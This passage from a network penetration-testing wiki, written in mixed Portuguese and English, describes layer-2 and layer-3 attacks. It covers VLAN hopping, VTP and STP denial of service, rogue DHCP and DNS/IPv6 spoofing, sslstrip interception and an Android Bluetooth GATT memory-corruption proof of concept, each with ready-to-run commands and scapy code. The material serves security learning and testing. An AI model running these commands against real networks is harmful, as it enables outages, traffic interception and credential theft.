root@kali:~# arp-scan -I eth1.250 10.121.5.0/24

</details>
```bash
# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up

# Another configuration example
sudo vconfig add eth0 30
sudo ip link set eth0.30 up
sudo dhclient -v eth0.30

Automatic VLAN Hopper

Os ataques discutidos de Dynamic Trunking and creating virtual interfaces an discovering hosts inside em outras VLANs são automaticamente realizados pela ferramenta: https://github.com/nccgroup/vlan-hopping—frogger

Double Tagging

Se um atacante conhece o valor do MAC, IP and VLAN ID of the victim host, ele poderia tentar double tag a frame com a sua VLAN designada e a VLAN da vítima e enviar um pacote. Como a vítima não conseguirá conectar de volta com o atacante, a melhor opção para o atacante é comunicar via UDP para protocolos que podem executar ações interessantes (como SNMP).

Outra opção para o atacante é lançar um TCP port scan spoofing an IP controlled by the attacker and accessible by the victim (provavelmente através da internet). Depois, o atacante poderia sniff no segundo host pertencente a ele, caso este receba alguns pacotes da vítima.

Para realizar este ataque você pode usar scapy: pip install scapy

from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)

Lateral VLAN Segmentation Bypass

Se você tem acesso a um switch ao qual está diretamente conectado, você tem a capacidade de bypass VLAN segmentation dentro da rede. Simplesmente mude a porta para trunk mode (otherwise known as trunk), crie interfaces virtuais com os IDs das VLANs alvo e configure um endereço IP. Você pode tentar solicitar o endereço dinamicamente (DHCP) ou configurá-lo estaticamente. Depende do caso.

Lateral VLAN Segmentation Bypass

Layer 3 Private VLAN Bypass

Em certos ambientes, como redes Wi‑Fi de convidados, as configurações de port isolation (also known as private VLAN) são implementadas para impedir que clientes conectados a um wireless access point se comuniquem diretamente entre si. No entanto, foi identificada uma técnica que pode contornar essas medidas de isolamento. Essa técnica explora tanto a ausência de ACLs de rede quanto sua configuração inadequada, permitindo que pacotes IP sejam roteados através de um router para alcançar outro cliente na mesma rede.

O ataque é executado criando um pacote que carrega o endereço IP do cliente de destino, mas com o MAC do router. Isso faz com que o router encaminhe erroneamente o pacote para o cliente alvo. Essa abordagem é semelhante à usada em Double Tagging Attacks, onde a capacidade de controlar um host acessível à vítima é usada para explorar a falha de segurança.

Key Steps of the Attack:

1. Crafting a Packet: Um pacote é especialmente elaborado para incluir o endereço IP do cliente alvo, mas com o MAC do router.
2. Exploiting Router Behavior: O pacote elaborado é enviado ao router que, devido à configuração, redireciona o pacote para o cliente alvo, contornando o isolamento fornecido pelas configurações de private VLAN.

VTP Attacks

VTP (VLAN Trunking Protocol) centraliza o gerenciamento de VLANs. Ele utiliza números de revisão para manter a integridade da VLAN database; qualquer modificação incrementa esse número. Switches adotam configurações com números de revisão mais altos, atualizando suas próprias VLAN databases.

VTP Domain Roles

• VTP Server: Gerencia VLANs—cria, deleta, modifica. Ele transmite VTP announcements para os membros do domínio.
• VTP Client: Recebe VTP announcements para sincronizar sua VLAN database. Esse papel é restrito de modificar configurações locais de VLAN.
• VTP Transparent: Não participa de VTP updates, mas encaminha VTP announcements. Não é afetado por VTP attacks, mantendo um número de revisão constante igual a zero.

VTP Advertisement Types

• Summary Advertisement: Transmitido pelo VTP server a cada 300 segundos, carregando informações essenciais do domínio.
• Subset Advertisement: Enviado após alterações na configuração de VLAN.
• Advertisement Request: Emitido por um VTP client para solicitar um Summary Advertisement, tipicamente em resposta à detecção de um número de revisão de configuração mais alto.

As vulnerabilidades do VTP são exploráveis exclusivamente via trunk ports, já que os VTP announcements circulam somente por eles. Cenários pós-ataque DTP podem evoluir para VTP. Ferramentas como Yersinia podem facilitar VTP attacks, com o objetivo de apagar a VLAN database, interrompendo efetivamente a rede.

Note: This discussion pertains to VTP version 1 (VTPv1).

yersinia -G # Launch Yersinia in graphical mode

No modo gráfico do Yersinia, escolha a opção deleting all VTP vlans para purgar o banco de dados VLAN.

Ataques STP

Se não conseguir capturar frames BPDU nas suas interfaces, é improvável que tenha sucesso em um ataque STP.

STP BPDU DoS

O envio massivo de BPDUs TCP (Topology Change Notification) ou Conf (os BPDUs enviados quando a topologia é criada) sobrecarrega os switches, que deixam de funcionar corretamente.

yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing

STP TCP Attack

Quando um TCP é enviado, a CAM table dos switches será apagada em 15s. Então, se você estiver enviando continuamente esse tipo de packets, a CAM table será reiniciada continuamente (ou a cada 15segs) e, quando for reiniciada, o switch passa a se comportar como um hub

yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen

STP Root Attack

O atacante simula o comportamento de um switch para se tornar o STP root da rede. Assim, mais tráfego passará por ele. Isso é interessante quando você está conectado a dois switches diferentes.
Isso é feito enviando pacotes BPDUs CONF dizendo que o valor priority é menor do que a prioridade do switch root atual.

yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root

Se o atacante estiver conectado a 2 switches, ele pode ser a root da nova árvore e todo o tráfego entre esses switches passará por ele (a MITM attack will be performed).

yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages

Ataques CDP

CISCO Discovery Protocol (CDP) é essencial para a comunicação entre dispositivos CISCO, permitindo que eles se identifiquem e compartilhem detalhes de configuração.

Coleta Passiva de Dados

CDP é configurado para transmitir informações por todas as portas, o que pode representar um risco de segurança. Um atacante, ao conectar-se a uma porta do switch, pode executar sniffers de rede como Wireshark, tcpdump, ou Yersinia. Essa ação pode revelar dados sensíveis sobre o dispositivo de rede, incluindo seu modelo e a versão do Cisco IOS que executa. O atacante pode então mirar vulnerabilidades específicas na versão do Cisco IOS identificada.

Indução de Flood na Tabela CDP

Uma abordagem mais agressiva envolve lançar um ataque Denial of Service (DoS) ao sobrecarregar a memória do switch, fingindo ser dispositivos CISCO legítimos. Abaixo está a sequência de comandos para iniciar esse ataque usando Yersinia, uma ferramenta de rede projetada para testes:

sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices
# Alternatively, for a GUI approach:
sudo yersinia -G

Durante este ataque, a CPU do switch e a CDP neighbor table ficam fortemente sobrecarregadas, levando ao que muitas vezes é chamado de “paralisação da rede” devido ao consumo excessivo de recursos.

CDP Impersonation Attack

sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet

Você também pode usar scapy. Certifique-se de instalá-lo com o pacote scapy/contrib.

Ataques VoIP e a ferramenta VoIP Hopper

Telefones VoIP, cada vez mais integrados com dispositivos IoT, oferecem funcionalidades como destrancar portas ou controlar termostatos através de números de telefone especiais. Contudo, essa integração pode representar riscos de segurança.

A ferramenta voiphopper foi projetada para emular um telefone VoIP em vários ambientes (Cisco, Avaya, Nortel, Alcatel-Lucent). Ela descobre o VLAN ID da rede de voz usando protocolos como CDP, DHCP, LLDP-MED e 802.1Q ARP.

VoIP Hopper oferece três modos para o Cisco Discovery Protocol (CDP):

1. Sniff Mode (-c 0): Analisa pacotes de rede para identificar o VLAN ID.
2. Spoof Mode (-c 1): Gera pacotes personalizados que imitam os de um dispositivo VoIP real.
3. Spoof with Pre-made Packet Mode (-c 2): Envia pacotes idênticos aos de um modelo específico de Cisco IP phone.

O modo preferido por velocidade é o terceiro. Ele requer a especificação de:

• A interface de rede do atacante (-i parameter).
• O nome do dispositivo VoIP sendo emulado (-E parameter), seguindo o formato de nome da Cisco (por exemplo, SEP seguido por um endereço MAC).

Em ambientes corporativos, para imitar um dispositivo VoIP existente, pode-se:

• Inspecionar a etiqueta MAC no telefone.
• Navegar nas configurações de display do telefone para ver informações do modelo.
• Conectar o dispositivo VoIP a um laptop e observar requisições CDP com Wireshark.

Um comando de exemplo para executar a ferramenta no terceiro modo seria:

voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2

DHCP Attacks

Enumeration

nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover:
|   Response 1 of 1:
|     IP Offered: 192.168.1.250
|     DHCP Message Type: DHCPOFFER
|     Server Identifier: 192.168.1.1
|     IP Address Lease Time: 1m00s
|     Subnet Mask: 255.255.255.0
|     Router: 192.168.1.1
|     Domain Name Server: 192.168.1.1
|_    Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds

DoS

Dois tipos de DoS podem ser realizados contra servidores DHCP. O primeiro consiste em simular hosts falsos suficientes para consumir todos os possíveis endereços IP.
Esse ataque só funcionará se você conseguir ver as respostas do servidor DHCP e completar o protocolo (Discover (Comp) –> Offer (server) –> Request (Comp) –> ACK (server)). Por exemplo, isso não é possível em redes Wifi.

Outra forma de realizar um DoS em DHCP é enviar um pacote DHCP-RELEASE usando como endereço de origem cada possível IP. Então, o servidor vai pensar que todo mundo terminou de usar o IP.

yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed

Uma forma mais automática de fazer isso é usar a ferramenta DHCPing

You could use the mentioned DoS attacks to force clients to obtain new leases within the environment, and exhaust legitimate servers so that they become unresponsive. So when the legitimate try to reconnect, você pode fornecer valores maliciosos mencionados no próximo ataque.

Definir valores maliciosos

Um servidor DHCP malicioso pode ser configurado usando o script DHCP localizado em /usr/share/responder/DHCP.py. Isso é útil para ataques de rede, como capturar tráfego HTTP e credenciais, redirecionando o tráfego para um servidor malicioso. No entanto, configurar um gateway malicioso é menos eficaz, já que só permite capturar o tráfego de saída do cliente, perdendo as respostas do gateway legítimo. Em vez disso, recomenda-se configurar um servidor DNS ou WPAD malicioso para um ataque mais eficaz.

Abaixo estão as opções de comando para configurar o servidor DHCP malicioso:

• Our IP Address (Gateway Advertisement): Use -i 10.0.0.100 para anunciar o IP da sua máquina como o gateway.
• Local DNS Domain Name: Opcionalmente, use -d example.org para definir um nome de domínio DNS local.
• Original Router/Gateway IP: Use -r 10.0.0.1 para especificar o endereço IP do roteador ou gateway legítimo.
• Primary DNS Server IP: Use -p 10.0.0.100 para definir o IP do servidor DNS malicioso que você controla.
• Secondary DNS Server IP: Opcionalmente, use -s 10.0.0.1 para definir o IP de um servidor DNS secundário.
• Netmask of Local Network: Use -n 255.255.255.0 para definir a máscara da rede local.
• Interface for DHCP Traffic: Use -I eth1 para escutar o tráfego DHCP em uma interface de rede específica.
• WPAD Configuration Address: Use -w “http://10.0.0.100/wpad.dat” para definir o endereço de configuração WPAD, ajudando na interceptação de tráfego web.
• Spoof Default Gateway IP: Inclua -S para falsificar o endereço IP do gateway padrão.
• Respond to All DHCP Requests: Inclua -R para fazer o servidor responder a todas as solicitações DHCP, mas esteja ciente de que isso é ruidoso e pode ser detectado.

Ao usar corretamente essas opções, um servidor DHCP malicioso pode ser estabelecido para interceptar o tráfego de rede de forma eficaz.

# Example to start a rogue DHCP server with specified options
!python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R

Ataques EAP

Aqui estão algumas das táticas de ataque que podem ser usadas contra implementações 802.1X:

• Brute-force ativo de senhas via EAP
• Atacando o servidor RADIUS com conteúdo EAP malformado **(exploits)
• Captura de mensagens EAP e quebra de senhas offline (EAP-MD5 e PEAP)
• Forçar a autenticação EAP-MD5 para contornar a validação de certificados TLS
• Injetar tráfego de rede malicioso ao autenticar usando um hub ou similar

Se o atacante estiver entre a vítima e o servidor de autenticação, ele pode tentar degradar (se necessário) o protocolo de autenticação para EAP-MD5 e capturar a tentativa de autenticação. Em seguida, ele poderia realizar brute-force nisso usando:

eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt

FHRP (GLBP & HSRP) Ataques

FHRP (First Hop Redundancy Protocol) é uma classe de protocolos de rede projetada para criar um sistema de roteamento redundante ativo. Com FHRP, roteadores físicos podem ser combinados em um único dispositivo lógico, o que aumenta a tolerância a falhas e ajuda a distribuir a carga.

Engenheiros da Cisco Systems desenvolveram dois protocolos FHRP, GLBP e HSRP.

GLBP & HSRP Attacks

RIP

Três versões do Routing Information Protocol (RIP) são conhecidas: RIP, RIPv2 e RIPng. Datagrams são enviados para peers via porta 520 usando UDP pelo RIP e RIPv2, enquanto datagrams são broadcastados para a porta UDP 521 via multicast IPv6 pelo RIPng. Suporte para autenticação MD5 foi introduzido pelo RIPv2. Por outro lado, autenticação nativa não é incorporada pelo RIPng; em vez disso, depende-se dos cabeçalhos IPsec AH e ESP dentro do IPv6.

• RIP e RIPv2: Comunicação é feita através de datagrams UDP na porta 520.
• RIPng: Utiliza a porta UDP 521 para broadcast de datagrams via multicast IPv6.

Note que o RIPv2 suporta autenticação MD5 enquanto o RIPng não inclui autenticação nativa, dependendo de cabeçalhos IPsec AH e ESP no IPv6.

EIGRP Attacks

EIGRP (Enhanced Interior Gateway Routing Protocol) é um protocolo de roteamento dinâmico. É um protocolo distance-vector. Se não houver autenticação e configuração de interfaces passive, um invasor pode interferir no roteamento EIGRP e causar envenenamento de tabelas de roteamento. Além disso, a rede EIGRP (ou seja, sistema autônomo) é plana e não possui segmentação em zonas. Se um atacante injetar uma rota, é provável que essa rota se espalhe por todo o sistema EIGRP autônomo.

Atacar um sistema EIGRP requer estabelecer uma adjacência com um roteador EIGRP legítimo, o que abre muitas possibilidades, desde reconhecimento básico até várias injeções.

FRRouting permite implementar um roteador virtual que suporta BGP, OSPF, EIGRP, RIP e outros protocolos. Basta implantá-lo no sistema do atacante e você pode realmente se passar por um roteador legítimo no domínio de roteamento.

EIGRP Attacks

Coly possui capacidades para interceptar transmissões EIGRP. Também permite injetar pacotes para alterar configurações de roteamento.

OSPF

No protocolo Open Shortest Path First (OSPF) autenticação MD5 é comumente empregada para garantir comunicação segura entre roteadores. No entanto, essa medida de segurança pode ser comprometida usando ferramentas como Loki e John the Ripper. Essas ferramentas são capazes de capturar e quebrar hashes MD5, expondo a chave de autenticação. Uma vez obtida a chave, ela pode ser usada para introduzir novas informações de roteamento. Para configurar os parâmetros de rota e estabelecer a chave comprometida, utilizam-se as abas Injection e Connection, respectivamente.

• Captura e quebra de hashes MD5: Ferramentas como Loki e John the Ripper são usadas para isso.
• Configuração de parâmetros de rota: Feita através da aba Injection.
• Configuração da chave comprometida: A chave é configurada na aba Connection.

Other Generic Tools & Sources

• Above: Ferramenta para escanear tráfego de rede e encontrar vulnerabilidades
• Você pode encontrar mais informações sobre ataques de rede here.

Spoofing

O atacante configura todos os parâmetros de rede (GW, IP, DNS) do novo membro da rede enviando respostas DHCP falsas.

Ettercap
yersinia dhcp -attack 2 #More parameters are needed

ARP Spoofing

Check the previous section.

ICMPRedirect

ICMP Redirect consiste em enviar um ICMP packet type 1 code 5 que indica que o attacker é o melhor caminho para alcançar um IP. Então, quando a victim quiser entrar em contato com o IP, enviará o packet através do attacker.

Ettercap
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]

DNS Spoofing

O attacker irá resolver alguns (ou todos) os domínios que o victim solicitar.

set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on

Configurar o próprio DNS com dnsmasq

apt-get install dnsmasq
echo "addn-hosts=dnsmasq.hosts" > dnsmasq.conf
echo "127.0.0.1   domain.example.com" > dnsmasq.hosts
sudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS

Gateways Locais

Frequentemente existem múltiplas rotas para sistemas e redes. Depois de construir uma lista de endereços MAC na rede local, use gateway-finder.py para identificar hosts que suportam encaminhamento IPv4.

</details>


### [Spoofing LLMNR, NBT-NS, and mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)

Para resolução de nomes local quando as consultas DNS falham, sistemas Microsoft dependem de **Link-Local Multicast Name Resolution (LLMNR)** e do **NetBIOS Name Service (NBT-NS)**. Da mesma forma, implementações **Apple Bonjour** e **Linux zero-configuration** utilizam **Multicast DNS (mDNS)** para descobrir sistemas dentro de uma rede. Devido à natureza não autenticada desses protocolos e ao fato de operarem sobre UDP, enviando mensagens broadcast, eles podem ser explorados por atacantes que buscam redirecionar usuários para serviços maliciosos.

Você pode personificar serviços que são procurados pelos hosts usando o Responder para enviar respostas falsas.\  
Read here more information about [how to Impersonate services with Responder](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).

### [Spoofing WPAD](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)

Navegadores comumente empregam o **Web Proxy Auto-Discovery (WPAD)** para adquirir automaticamente as configurações de proxy. Isso envolve buscar detalhes de configuração de um servidor, especificamente através de uma URL como "http://wpad.example.org/wpad.dat". A descoberta desse servidor pelos clientes pode ocorrer por vários mecanismos:

- Através de **DHCP**, onde a descoberta é facilitada pela utilização de uma entrada com código especial 252.
- Por **DNS**, que envolve procurar por um nome de host rotulado _wpad_ dentro do domínio local.
- Via **Microsoft LLMNR e NBT-NS**, que são mecanismos de fallback usados quando as consultas DNS não obtêm sucesso.

A ferramenta Responder se aproveita desse protocolo atuando como um **servidor WPAD malicioso**. Ela usa DHCP, DNS, LLMNR e NBT-NS para enganar clientes a se conectarem a ela. Para aprofundar em como serviços podem ser personificados usando o Responder [check this](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).

### [Spoofing SSDP and UPnP devices](spoofing-ssdp-and-upnp-devices.md)

Você pode oferecer diferentes serviços na rede para tentar **enganar um usuário** a inserir algumas **plain-text credentials**. **More information about this attack in** [**Spoofing SSDP and UPnP Devices**](spoofing-ssdp-and-upnp-devices.md)**.**

### IPv6 Neighbor Spoofing

Este ataque é muito semelhante ao ARP Spoofing, mas no mundo IPv6. Você pode fazer a vítima acreditar que o IPv6 do GW possui o MAC do atacante.
```bash
sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds

sysctl -w net.ipv6.conf.all.forwarding=1 4
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16

dhcp6.spoof on
dhcp6.spoof.domains <list of domains>

mitm6

apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -

FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0  openssl-connect:[SERVER]:[PORT],verify=0

</details>


### Notas de Descoberta Ativa

Tenha em conta que, quando um pacote UDP é enviado para um dispositivo que não possui a porta solicitada, um ICMP (Port Unreachable) é enviado.

### **ARP discover**

Pacotes ARP são usados para descobrir quais IPs estão a ser usados dentro da rede. O PC tem de enviar uma requisição para cada endereço IP possível e apenas os que estiverem a ser usados irão responder.

### **mDNS (multicast DNS)**

Bettercap envia um pedido MDNS (a cada X ms) pedindo por **\_services\_.dns-sd.\_udp.local** — a máquina que vê este pacote normalmente responde a este pedido. Depois, ele procura apenas por máquinas que respondem a "services".

**Ferramentas**

- Avahi-browser (--all)
- Bettercap (net.probe.mdns)
- Responder

### **NBNS (NetBios Name Server)**

Bettercap envia pacotes em broadcast para a porta 137/UDP pedindo pelo nome "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".

### **SSDP (Simple Service Discovery Protocol)**

Bettercap envia pacotes SSDP em broadcast procurando por todo tipo de serviços (UDP Port 1900).

### **WSD (Web Service Discovery)**

Bettercap envia pacotes WSD em broadcast procurando por serviços (UDP Port 3702).


## Bluetooth (L2CAP/ATT/GATT) Ataques

- Android Fluoride exposes services over L2CAP PSMs (e.g., SDP 0x0001, RFCOMM 0x0003, BNEP 0x000F, AVCTP 0x0017/0x001B, AVDTP 0x0019, ATT/GATT 0x001F). Services register via:
```c
uint16_t L2CA_Register2(uint16_t psm, const tL2CAP_APPL_INFO& p_cb_info,
bool enable_snoop, tL2CAP_ERTM_INFO* p_ertm_info,
uint16_t my_mtu, uint16_t required_remote_mtu,
uint16_t sec_level);

acl  = ACLConnection(src_bdaddr, dst_bdaddr, auth_mode='justworks')
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=672)
gatt.send_frag(p8(GATT_READ)+p16(1234))
print(gatt.recv())

# GATT_REQ_READ_MULTI_VAR (0x20), MTU=55
acl  = ACLConnection(interface, bdaddr)
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=55)
pkt  = b'\x20'  # opcode
pkt += p16(9); pkt += p16(9); pkt += p16(9); pkt += p16(9)
gatt.send(pkt)
# On 4th insert: p_buf->len=55 (1 + 3*(16+2)), total_len=73 -> len=16-(73-55)=-2 -> ~64KB overwrite